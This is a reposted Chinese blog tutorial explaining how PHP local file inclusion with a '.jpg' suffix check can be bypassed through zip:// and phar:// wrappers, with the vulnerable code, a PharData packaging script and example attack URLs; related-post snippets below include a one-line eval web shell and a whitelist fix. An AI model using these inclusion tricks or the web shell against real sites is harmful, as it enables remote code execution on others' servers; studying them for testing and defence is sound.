【文件包含技巧拓展】————2、zip或phar协议包含文件

最新推荐文章于 2025-10-18 10:13:14 发布
转载 最新推荐文章于 2025-10-18 10:13:14 发布 · 3.6k 阅读 · 5

本文探讨了在PHP环境中如何通过zip与phar协议绕过常见的文件包含限制,实现远程代码执行。介绍了如何构造zip://与phar://URL来包含指定的PHP脚本,适用于PHP 5.3.0及更高版本。

这个方法适用于验证包含文件为特定后缀时。 例如以下代码

<?php
$file = $_GET['file'];
if(isset($file) && strtolower(substr($file, -4)) == ".jpg"){
	include($file);
}
?>

<?php
$file = $_GET['file'];
include($file.'.jpg');
?>

上面的代码一个验证了后缀是否为jpg,一个是直接添加了jpg后缀,然后才包含。对于现在这种情况,要包含php文件的话的,可以通过截断。但是\x00的截断在php>5.3.4就没用了,而且还要考虑GPC,所以是比较鸡肋的方法。其实我们可以通过zip协议和phar协议来包含文件。

zip://

首先我们新建一个zip文件,里面压缩着一个php脚本。

然后我们构造zip://php.zip#php.jpg

http://127.0.0.1/file.php?file=zip://php.zip%23php.jpg

这样就成功shell了。

phar://

首先我们要用phar类打包一个phar标准包

<?php
$p = new PharData(dirname(__FILE__).'/phartest2.zip', 0,'phartest2',Phar::ZIP) ; 
$x=file_get_contents('./php.php');
$p->addFromString('a.jpg', 
$x); 
?>

会生成一个zip的压缩文件。然后我们构造

http://127.0.0.1/file.php?file=phar://php.zip/php.jpg

也可以直接shell

其中phar适用范围为php>5.3.0

以下的这种包含方式在这样的情况下是无效的。

include(一个规定的路径+可控点)

 

 

[极客大挑战 2020]Roamphp2-Myblog - 伪协议+文件上传+(LFI&ZIP)||(LFI&Phar)【***】
oZuoShen123的博客
10-09 615
1、点击login,进入登录界面,用户名在首页提示了是longlone,密码未知,无法登录。 2、点击其他地方,发现没有什么线索,唯一有的只有page这个参数。 3、题目描述:Do you know the PHP pseudo-protocol? —— 意思就是跟伪协议有关系 关键代码:
phar / zip协议的应用wp
CHUNJIUJUN的博客
08-13 2094
查看源码 显示只能上传txt文件 上传一个txt文件试试 上传成功 这里我们退回主页面,发现有一个LFI here,意思是:这里是文件包含,点进去发现页面和源码什么都没有 退回主页面查看主页面源码,发现有提示 lfi.txt 我们将刚刚的 lfi.php 改成 lfi.txt 试一试,发现有内容,意思是给file传了一次参数,给file传的参数不能为空,无论file名是什么,都在file名后加一个 .php 后缀,注释的意思是值允许php文件包含 ...
zip文件协议解析
DefiniteGoal的博客
08-08 2183
ZIP文件协议解析
文件包含之——phar协议
abc18964814133的博客
05-09 9305
文件上传之phar协议
深入掌握Zip压缩与解压缩技术实战指南
最新发布
weixin_29155599的博客
10-18 1018
Zip文件格式由Phil Katz于1989年通过PKZIP工具首次发布,源于对当时主流ARC格式的效率改进需求。其核心优势在于开放规范、高效压缩与跨平台兼容性。随着WinZip等图形化工具的兴起,Zip迅速成为个人计算机时代的标准压缩方案,并被Windows、macOS及Linux系统原生支持。
phar协议文件包含
fzy2003的博客
07-05 600
掌握phar协议文件包含的用法。
phar文件包含实例:
weixin_53303754的博客
10-15 243
打开源码,得到有用的信息有lfi.php、upload.php、以及lfi.txt文件。打开lfi.txt文件,得到有用信息为%s.php,会给上传的目标文件添加php后缀。在html目录下,可进一步查看flag.php、upload.php。lfi.php、upload.php文件源码空空如也。使用phar协议进行文件包含。注意:链接末尾hack2无后缀。上传hack2.txt文件
zipphar文件包含
L1ni01
12-06 2327
zipphar文件包含 phar文件包含 phar协议要求:php大于5.3.0 需要将php.ini的参数phar.readonly设置为off 这个方法适用于验证包含文件为特定后缀时。 使用Phar://伪协议流可以Bypass一些上传的waf,大多数情况下和文件包含一起使用,就类似于我们的压缩包(其实就是一个压缩包),只不过我们换了一种方式去执行而已 本地测试: test.php <?php @eval($_POST["cmd"]);?> 然后将test.php压缩,将压缩文件改后缀为
利用 phar协议进行文件包含
m0_73612768的博客
11-03 770
在这里前后端都会校验,而且都采用白名单机制,并且 PHP 版本高于 5.2.4 ,什么 %00截断,0x00截断都用不了
NSSCTF-Web题目21(文件上传-phar协议、RCE-空格绕过)
weixin_54055099的博客
07-02 1079
phar协议、RCE-空格绕过
php伪协议 文件包含,文件包含漏洞(伪协议利用)
weixin_33166692的博客
03-30 1172
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些伪协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.伪协议利用file伪协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php伪协议,有两种类型 input 和 ...
php文件上传+文件包含(phar协议)
WFC1006848997的博客
11-22 6801
test.bugku-web-upload—文件上传与文件包含组合 右键查看源码发现 继续查看源码,提示参数是file,还有一个upload.php 跟进upload.php,是个上传界面 那就可以猜测出是 文件上传与文件包含的组合,所以直接先使用伪协议查看源码,使用的是php://filter协议 php://filter/convert.base64-encode/resource= 首先读取include.php的源码 发现后缀多了一个.php,所以就不加.php了 base64解码 &l
php归档格式:phar文件详解(创建、使用、解包还原提取)
m0_66964946的博客
02-01 980
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHP 的 Web 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建使用,使用php脚本就能创建提取它。自那时起,人们做了大量工作来改善 Phar 归档的性能。
zip文件协议&gzip文件协议
DefiniteGoal的博客
08-19 1628
zip及gzip协议
文件 包含
Z_l123的博客
02-28 730
概念 把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。 原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入 1.本地文件包含(无视后缀) 创建文件包含:include.php <?php include("print.php"); ?> 另创建print.php <?php echo "hello world!!!"; ?
phar反序列化+文件上传与例题讲解
2301_79708753的博客
01-26 2252
web笔记相关于phar反序列化+文件上传与例题讲解,欢迎各位指正
『PHP』phar文件详解_phar文件格式_调用phar类方法生成phar文件
Ho1aAs‘s Blog
09-04 9963
phar简介 phar,全称为PHP Archive,phar扩展提供了一种将整个PHP应用程序放入.phar文件中的方法,以方便移动、安装。.phar文件的最大特点是将几个文件组合成一个文件的便捷方式,.phar文件提供了一种将完整的PHP程序分布在一个文件中并从该文件中运行的方法。 可以将phar文件类比为一个压缩文件 phar demo 注意:默认phar扩展是只读模式,需要手动配置php.ini中phar.readonly= Off 无法用ini_set修改 『踩坑记录』PHP-使用ini_set
文件包含漏洞学习,面试总结+详细解答
2401_83974020的博客
04-14 1214
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
利用PHAR协议进行PHP反序列化攻击
Jeeseen123的博客
06-28 545
PHAR (“Php ARchive”) 是PHP中的打包文件,相当于Java中的JAR文件,在php5.3者更高的版本中默认开启。PHAR文件缺省状态是只读的,当我们要创建一个Phar文件需要修改php.ini中的phar.readonly,修改为:phar.readonly = 0 当通过phar://协议phar文件进行文件操作时,将会对phar文件中的Meta-data进行反序列化操作,可能造成一些反序列化漏洞。 本文由锦行科技的安全研究团队提供,从攻击者的角度展示了PHAR反序列化攻击的原理和
文件包含zip协议
01-27
### 关于PHP文件包含漏洞与ZIP协议 #### ZIP协议概述 `phar://` 协议允许将多个PHP文件打包成单一文件,并支持与其他压缩格式如ZIP互转。此特性使得攻击者可以通过上传特制的ZIP文件并利用文件包含漏洞来执行任意代码[^1]。 #### 使用场景 当应用程序存在本地远程文件包含漏洞时,如果服务器配置不当,则可能允许通过 `phar://` 类似的伪协议访问和解析ZIP包内的资源。例如,在某些情况下,开发者可能会错误地认为只允许特定扩展名(如.jpg)是安全措施之一,但实际上这些图片文件内部可以嵌入恶意的PHP代码并通过ZIP归档绕过简单的文件类型检查[^2]。 #### 安全风险 这种类型的攻击可能导致严重的后果: - **远程命令执行**:一旦成功注入含有恶意脚本的ZIP档案,并被应用加载运行,就可实现完全控制目标主机。 - **敏感信息泄露**:攻击者能够读取系统上的任何文件,包括但不限于数据库凭证、源码等重要资料。 - **横向移动**:借助已获取权限进一步探索内网环境,寻找更多潜在弱点加以利用。 为了防止此类威胁的发生,建议遵循最佳实践指南加强防御层次,比如采用严格的输入验证策略、实施最小权限原则以及定期审查第三方库的安全状态等措施[^4]。 ```php // 不推荐的做法 - 存在安全隐患 include($_GET['page']); // 推荐做法 - 白名单限定合法页面路径 $allowed_pages = ['home', 'about']; $page = isset($_GET['page']) && in_array($_GET['page'], $allowed_pages) ? $_GET['page'] : 'home'; include("$page.php"); ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值